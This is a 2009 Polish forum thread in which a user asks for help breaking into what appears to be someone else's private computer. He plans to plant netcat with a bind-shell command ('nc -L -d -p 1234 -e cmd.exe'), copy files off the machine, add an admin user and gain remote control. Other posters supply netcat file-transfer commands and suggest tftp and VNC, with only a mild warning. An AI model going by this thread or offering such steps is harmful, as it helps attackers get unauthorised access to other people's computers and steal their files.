Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 13

Temat: kopiowanie plikow cmd - netCat

Domyślnie kopiowanie plikow cmd - netCat

Witam !!

Jako iz to moj pierwszy post na tym forum chcialbym wszystkich przywitac - czesc

Ale do sedna - jest komp prywatny. Na nim siedzi avast i chyba zaden firewall. Jednak tego pewien nie jestem gdyz komp nie oddaje odp na ping, a skanowanie portow nie daje praktycznie nic. W celach cwiczeniowych podobna konfiguracje walnalem na swoj 2gi komp i zachowuje sie on z deka inaczej (np odpowiada na pingi), wiec cos chyba przeoczylem..

Do sedna wracajac Postanowilem ze zamiast lamac go na rozniaste sposoby, podrzuce tam zwyczajnie netCat'a z opcja: "nc -L -d -p 1234 -e cmd.exe". Wszelkie trojany odpadaja gdyz avast dzielnie je wykrywa :/ a przy kompie mam jedynie chwile na podrzucenie pliku. No i teraz moje pytania:

1) testowany komp jest w LANie ze mna, docelowy bedzie mial publiczne, stale IP. Po podlaczeniu do niego dostane zdalnie odpalony cmd. Jak moge skopiowac pliki z docelowego kompa na moj? podkreslam ze jestem za NAT'em i IP mam wewnetrzny. Jak skladnia takiego polecenia by wygladala?

2)znacie jakies programy ktore mozna podrzucic na kompa i ktore transfer plikow ulatwiaja? cos jakby portable ftp server czy cos? Moje poszukiwania na chwile obecna mozna o obic o kant ... Chodzi o cos, co sie zwyczajnie odpali z exe i uruchomi usluge ftp.

3)jakies inne pomysly na latwe i bezbolesne przeslanie pliku z docelowego kompa na moj? i ew w druga strone takze?

4) zauwazylem ze CMD przy poleceniu dir nie wyswietla ukrytych plikow.. czy ktos wie jak temu zaradzic? wiadomo ze ukryte foldery sa zazwyczaj najbardziej pozadane <--- to juz wiem - trzeba dac komende dir /AH

z gory dziekuje za odp i pozdrawiam,
    mayhem
    Ostatnio edytowane przez mayhem : 01-04-2009 - 17:20

Domyślnie

Cytat Napisał mayhem Zobacz post
    Ale do sedna - jest komp prywatny. Na nim siedzi avast i chyba zaden firewall. Jednak tego pewien nie jestem gdyz komp nie oddaje odp na ping, a skanowanie portow nie daje praktycznie nic. W celach cwiczeniowych podobna konfiguracje walnalem na swoj 2gi komp i zachowuje sie on z deka inaczej (np odpowiada na pingi), wiec cos chyba przeoczylem..

Do sedna wracajac
    Idziesz do sedna i nie odchodząc od niego, wracasz? Mniam. Windowsowy Firewall? Ustawienia routera?
    1) testowany komp jest w LANie ze mna, docelowy bedzie mial publiczne, stale IP. Po podlaczeniu do niego dostane zdalnie odpalony cmd. Jak moge skopiowac pliki z docelowego kompa na moj? podkreslam ze jestem za NAT'em i IP mam wewnetrzny. Jak skladnia takiego polecenia by wygladala?
    Kopiuje się na docelowy komputer... Dlatego się tak nazywa. Ale zrozumiałem o co Ci chodzi, nie wiesz przypadkiem czy cmd.exe nie obsługuje potoków? Radzę sprawdzić. Jeśli tak to (po bashowemu) na komputerze zdalnym:
    nc -l -p port -v < plik
    A na komputerze lokalnym:
    nc ip port > plik

4) zauwazylem ze CMD przy poleceniu dir nie wyswietla ukrytych plikow.. czy ktos wie jak temu zaradzic? wiadomo ze ukryte foldery sa zazwyczaj najbardziej pozadane
    help dir
    dir /h
    dir /help
    Któreś powinno Ci helpa wypisać.
    http://nikowek.blogspot.com/
    Zbrojne Ramię Pingwina!
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
    O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
    G+ e- h! r% y?
    ------END GEEK CODE BLOCK------

Domyślnie

Cytat Napisał Nikow Zobacz post
    Windowsowy Firewall? Ustawienia routera?
    nieznane mi to jest. wiem tylko ze net jest z vectry i ze ma publiczne, stale IP. jesli cos sie przypluje o wychodzace polaczenie nc to sie szybko kliknie by dopuszczal i bedzie git.

Cytat Napisał Nikow Zobacz post
    Kopiuje się na docelowy komputer... Dlatego się tak nazywa. Ale zrozumiałem o co Ci chodzi, nie wiesz przypadkiem czy cmd.exe nie obsługuje potoków? Radzę sprawdzić. Jeśli tak to (po bashowemu) na komputerze zdalnym:
    nc -l -p port -v < plik
    A na komputerze lokalnym:
    nc ip port > plik
    Docelowy, bo mam tez testowy :P kobinowalem podobnie jak Ty i to nie dzialalo.. ale nie dawalem parametru -v. teraz juz ladnie jest ok Ale dalej nie moge przejsc tego ze jestem za NAT'em a docelowy ma publiczny. Takie kopiowanie dziala tylko w LAN'ie..
    tylko np w cmd jest polecenie xcopy - da mi caly katalog. w nc moge jedynie pojedyncze pliki..

dziekuje bardzo Nikow za zainteresowanie!

jeszcze jakies sugestie? odp na pozostale pytania?
    Ostatnio edytowane przez mayhem : 01-04-2009 - 19:49

Domyślnie

Docelowy, bo mam tez testowy :P kobinowalem podobnie jak Ty i to nie dzialalo.. ale nie dawalem parametru -v. teraz juz ladnie jest ok Ale dalej nie moge przejsc tego ze jestem za NAT'em a docelowy ma publiczny. Takie kopiowanie dziala tylko w LAN'ie..
    Przypatrz się dokładnie podanym wcześniej poleceniom. Ty się łączysz z hostem, a on Ci zapodaje ten plik. Nie Ty jemu, a skoro host ma publiczne IP, nie widzę problemu by się z nim połączyć. Patrz że korzystam tylko z danych, które mi udostępniłeś, nie zamierzam się domyślać o co chciałeś zapytać (a pytaj dokładnie, bo ja dokładnie zamierzam na pytania odpowiadać), czy masz tylko 3 porty do użytku itd.

jeszcze jakies sugestie? odp na pozostale pytania?
    Od tego masz google. Chociaż chcesz sugestii? Sugeruje Ci z tym skończyć. Albo... Weź się za to na poważnie, stwórz własne narzędzia.
    Ostatnio edytowane przez Mad_Dud : 01-04-2009 - 23:05
    http://nikowek.blogspot.com/
    Zbrojne Ramię Pingwina!
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
    O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
    G+ e- h! r% y?
    ------END GEEK CODE BLOCK------

Domyślnie

przepraszam jesli cos nie jest jasne. juz tak nad tym dumam ze sie totalnie zakrecilem z tym wszystkim. jesli chodzi o kopiowanie plikow to ja namotalem przy wpisywaniu komend. moj blad. ladnie nasluchuje polaczenia, potem jest ze sie polaczyl. tylko ... nie wysyla :/ po pewnym czasie przerywam wysylanie (bo widze po monicie polaczen ze nie idzie) to albo przesle pare kilobajtow albo w ogole nic. ale plik tworzy na hoscie. tylko ze wazy on wlasnie 0 albo delikatnie ponad.

plan mialem taki by uploadowac jakis maly serwerek ftp portable, ale z tym wychodza jakies dziwne rzeczy. raz ze trudno strasznie taki znalezc a dwa pliki konfiguracji niebardzo idzie przystosowac na hosta, gdy server ftp byl konfigurowany na kliencie.. czyli niewypal..

w takim razie moze inaczej to przedstawie. bo biegam za tym ale nie moge nic konkretnego znalezc. jestem juz powiedzmy w systemie. zdalnie siedze dzieki nc, i operuje za pomoca linii komend (cmd.exe). moge np dodac usera na prawach admina. z transferem plikow kiepsko, ale pracuje nad tym (nie mam pojecia czemu sie nie wysyla :/ ). co radzicie by zarzadzac tym kompem zdalnie w jakis "normalny" sposob a nie przez linie komend? albo chocby cos lepszego do transferu plikow.. ?
    przypuszczam ze macie doswiadczenie wiec zapewne to wiecie. ja nie mam i staram sie tego dowiedziec.. tak wiec co dalej? szukajac po necie widzialem arta w ktorym autor wlasnie dodal usera na prawach admina i potem polaczyl sie przez zdalny pulpit. no niby wszystko pieknie ale ten zdalny puplit tez musi byc zainstalowany (xp home) albo chociaz wlaczony (xp prof).
    reasumujac naprawde prosze o odp ktora pomoze mi w mym problemie.

pozdrawiam i z gory dziekuje, mayhem

Domyślnie

tftp /?

znaczki

Domyślnie

XP Home nie ma zdalnego pulpitu w ogole i nie da sie z tego co wiem doinstalowac... moze lokalnie grzebiac w rejestrze przez pol dnia cos wykrecisz ale zdalnie odpusc sobie - zainwestuj w VNC

Dobra rada... zanim zaczniesz szwedac sie po systemie nalezacym do kogos innego poznaj go dobrze off-line... pytasz o cos do przesylania plikow - chcesz serwer instalowac (chyba tylko po to aby firewall alert wywalil userowi ze aplikacja chce dzialac jako serwer)... ja sie pytam "po co"? Do przesylania plikow sa narzedzia ktore XP ma domyslnie, po co kombinowac? Jakbys znal lepiej system to bys wiedzial od razu jakie narzedzia.

Czas zaczac od poczatku, nie od konca...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Domyślnie

XP Home nie ma zdalnego pulpitu w ogole i nie da sie z tego co wiem doinstalowac...
    Da się, tylko trzeba się nieco pobawić i 'przerobić' go na prof.
    * markossx *

Domyślnie

Tak... tylko jak pozniej wyglada kwestia legalnoscsci i dalszych automatycznych aktualizacji Windows?
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Domyślnie

Ingerujesz w bebechy więc na 100% tracisz licencję ale była mowa czy się da czy nie
    * markossx *

Strona 1 z 2 12 OstatniOstatni